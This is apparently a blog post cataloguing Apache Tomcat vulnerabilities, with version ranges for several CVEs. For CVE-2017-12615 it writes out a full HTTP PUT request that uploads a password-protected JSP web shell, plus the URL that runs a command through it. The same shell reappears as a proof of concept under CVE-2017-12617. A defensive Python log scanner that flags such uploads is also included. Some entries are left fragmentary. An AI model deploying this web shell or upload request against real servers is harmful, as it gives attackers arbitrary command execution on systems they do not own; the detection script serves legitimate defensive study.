  • Application security

    cve-2020-1938

    Date
    2020.1 (reported by Chaitin Tech)
    
    Type
    RCE
    
    Affected scope (lower versions not tested)
    Apache Tomcat 9.x < 9.0.31
    Apache Tomcat 8.x < 8.5.51
    Apache Tomcat 7.x < 7.0.100
    Apache Tomcat 6.x

    Weak passwords on the management console

    CVE-2019-0232

    Date
    2019
    
    Type
    Arbitrary code execution
    
    Affected versions
    Apache Tomcat 9.0.0.M1 to 9.0.17
    Apache Tomcat 8.5.0 to 8.5.39
    Apache Tomcat 7.0.0 to 7.0.93
    
    Preconditions
    Operating system: Windows

    CVE-2019-0211

    Date
    2019
    
    Type
    Privilege escalation
    
    Affected versions

    CVE-2017-12615

    Date
    2017
    
    Affected scope
     Apache Tomcat 7.0.0 - 7.0.81
    
    Preconditions
    (1) web.xml
    

    (2)
    HTTP PUT requests are supported
    (3)
    Operating system: Windows

    Reproduction

    (1) Send the request

    PUT /dark.jsp HTTP/1.1
    Host: xx.xx.163.193:8083
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Length: 1039

    
    

    <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

    (2) Command execution
    xx.xx.163.193:8083/dark.jsp?&pwd=023&cmd=whoami
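
A defender-side check for the request pair shown above, as an added example that is not part of the original post: it scans a Tomcat access log for a successful PUT of a JSP path followed by requests to that file. It assumes the AccessLogValve `common` pattern; the sample log lines, addresses, and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumed log layout, Tomcat AccessLogValve "common": %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+$'
)
JSP_RE = re.compile(r"\.jspx?", re.IGNORECASE)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Dec/2019:10:01:02 +0800] "GET /index.jsp HTTP/1.1" 200 1432
203.0.113.9 - - [12/Dec/2019:10:02:10 +0800] "PUT /dark.jsp HTTP/1.1" 201 -
203.0.113.9 - - [12/Dec/2019:10:02:15 +0800] "GET /dark.jsp?&pwd=023&cmd=whoami HTTP/1.1" 200 31
198.51.100.7 - - [12/Dec/2019:10:03:00 +0800] "PUT /docs/readme.txt HTTP/1.1" 201 -
198.51.100.8 - - [12/Dec/2019:10:04:00 +0800] "PUT /probe.jsp HTTP/1.1" 403 -
this line is malformed and must be skipped
"""

def jsp_key(path):
    """Path up to and including the .jsp/.jspx extension, or None if absent."""
    hit = JSP_RE.search(path)
    return path[:hit.end()] if hit else None

def find_jsp_uploads(log_text):
    """Return one finding per JSP path written via PUT, with later requests to it."""
    findings = {}
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # tolerate truncated or foreign lines
        parts = urlsplit(m["target"])
        key = jsp_key(unquote(parts.path).lower())
        status = int(m["status"])
        if m["method"] == "PUT" and key and 200 <= status < 300:
            findings.setdefault(key, {"path": key, "uploader": m["host"],
                                      "uploaded_at": m["ts"], "followups": []})
        elif m["method"] in ("GET", "POST") and key in findings:
            findings[key]["followups"].append(
                {"host": m["host"], "ts": m["ts"], "has_query": bool(parts.query)})
    return list(findings.values())

if __name__ == "__main__":
    for finding in find_jsp_uploads(SAMPLE_LOG):
        print(finding)
```

A finding with at least one follow-up request carrying a query string is the higher-priority case to triage; rejected PUTs (such as the 403 line) are not reported.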

    CVE-2017-12616

    Date
    2017
    
    Type
    Information disclosure
    
    Affected scope
    Apache Tomcat 7.0.0 - 7.0.80 
    
    Preconditions
    server.xml - VirtualDirContext - absent by default - added manually

    CVE-2017-12617

    Date
    2017
    
    Type
    Remote code execution
    
    
    Affected scope
    Apache Tomcat 7.0.0 - 7.0.81

    poc:
    <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
    <%!public static String excuteCmd(String c)
    {
    StringBuilder line = new StringBuilder();
    try
    {
    Process pro = Runtime.getRuntime().exec(c);
    BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
    String temp = null;
    while ((temp = buf.readLine()) != null)
    {
    line.append(temp+"\n");
    }
    buf.close();
    }
    catch (Exception e)
    {
    line.append(e.getMessage());
    }
    return line.toString();
    }
    %>
    <%
    if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))
    {
    out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
    }
    else
    {
    out.println(":-)");
    }
    %>


    Apache Tomcat chunked request remote denial-of-service vulnerability (CVE-2014-0075)

  • Original article: https://www.cnblogs.com/AtesetEnginner/p/12050338.html